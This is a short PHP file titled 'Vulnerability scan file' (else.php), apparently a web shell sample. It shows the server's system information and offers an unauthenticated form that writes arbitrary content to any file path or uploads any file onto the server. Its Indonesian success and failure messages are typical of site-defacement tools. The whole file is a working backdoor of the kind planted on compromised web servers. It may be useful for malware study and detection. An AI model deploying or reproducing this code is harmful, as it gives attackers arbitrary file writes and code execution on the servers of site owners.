Vulnerability scan file

else.php

<?php

$content = stripslashes($_POST['content']);
$cfile = $_POST['cfile'];
$ufile = $_POST['ufile'];

echo '<b><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">';
echo '<textarea name=content style="width:585px;height:200px">'.$content.'</textarea><br>';
echo '<input type="text" name="cfile" size="10" value="newfile.php">';
echo '<input name="_create" type="submit" id="_upl" value="Create">';
echo '<input type="file" name="file" size="30"><input type="text" name="ufile" size="10" value="newfile.php">';
echo '<input name="_upload" type="submit" id="_upl" value="Upload"></form>';

if ($_POST['_create']) {
    $handle = fopen($cfile, 'w');
    
    if ($handle) {
        if (fwrite($handle, $content) === FALSE) {
        	echo "<b>Create $cfile GAGAL</b><br>";
        } else {
        	echo "<b>Create $cfile SUKSES !!!</b><br>";
        }
        
        fclose($handle);
    } else {
    	echo '<b>Create File GAGAL</b><br><br>';
    }
}

if ($_POST['_upload']) {
    if (@copy($_FILES['file']['tmp_name'], $ufile)) {
    	echo "<b>Upload $ufile SUKSES !!!</b><br><br>";
    } else {
    	echo "<b>Upload $ufile GAGAL !!!</b><br><br>";
    }
}